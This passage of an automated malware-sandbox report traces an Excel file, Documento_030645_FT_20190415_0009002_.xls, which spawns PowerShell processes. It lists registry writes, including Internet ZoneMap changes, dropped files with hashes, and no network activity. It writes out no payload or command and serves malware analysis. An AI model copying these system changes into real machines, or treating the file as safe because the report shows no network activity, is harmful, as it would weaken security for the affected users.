HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
Enable
0
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
e`7
6560370044040000010000000000000000000000
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
44040000CC4FB6525CF3D40100000000
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
118D88
04000000440400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000330030003600340035005F00460054005F00320030003100390030003400310035005F0030003000300039003000300032005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050E893535CF3D401888D1100798D110000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
118D88
04000000440400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000330030003600340035005F00460054005F00320030003100390030003400310035005F0030003000300039003000300032005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050E893535CF3D401888D1100798D110000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1092
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1317994520
1092
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994640
1092
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1317994500
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{BA0396A5-5F32-4B7B-9F16-174258D824DE}
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
118D88
04000000440400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000330030003600340035005F00460054005F00320030003100390030003400310035005F0030003000300039003000300032005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050E893535CF3D401888D1100798D110000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118F4D
118F4D
04000000440400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000330030003600340035005F00460054005F00320030003100390030003400310035005F0030003000300039003000300032005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000009CFB24EF1938024D8F11004D8F110000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D4F35C53DDE9A0][O00000000]*C:\Users\admin\Desktop\
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D4F35C53E03390][O00000000]*C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
25921885
1348
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2340
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
5
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
2340
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 16d0fd6e07266b2c15a9d7bc6623f506
SHA256: 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b
2340
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF119632.TMP
binary
MD5: 16d0fd6e07266b2c15a9d7bc6623f506
SHA256: 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b
2340
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FSNCE7I9DHG9I0S5A06F.temp
––
MD5:  ––
SHA256:  ––
1348
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1191ae.TMP
binary
MD5: 16d0fd6e07266b2c15a9d7bc6623f506
SHA256: 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b
1348
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 16d0fd6e07266b2c15a9d7bc6623f506
SHA256: 833367dc50386d139010182cede41b4d055f8d463626ec4005652528b3e0871b
1348
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J5VKHE74T6XU1MI03TV.temp
––
MD5:  ––
SHA256:  ––
1092
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_030645_FT_20190415_0009002_.xls.LNK
lnk
MD5: 152c2b8e0467221529e5036b3ad70371
SHA256: 7ee1c4e4cadb4dc02b8ddfccd00c15f4816ca3b006f77d46d2d17d92022fb319
1092
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 566ca839531d7e37c18858997563a172
SHA256: 94784b95a77f7f359ca51161591382b57458fa08ba6113d0c459a6fc2153e9fb
1092
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVR88C5.tmp.cvr
––
MD5:  ––
SHA256:  ––
3044
WinRAR.exe
C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls
document
MD5: bdca0278481f87df29f57f9a59bee23c
SHA256: 9dc2a7a5a2f6a93ccedd912ce3a529d7c42155396a5610536ecf107df15ddab1

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

Process Message
powershell.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
powershell.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144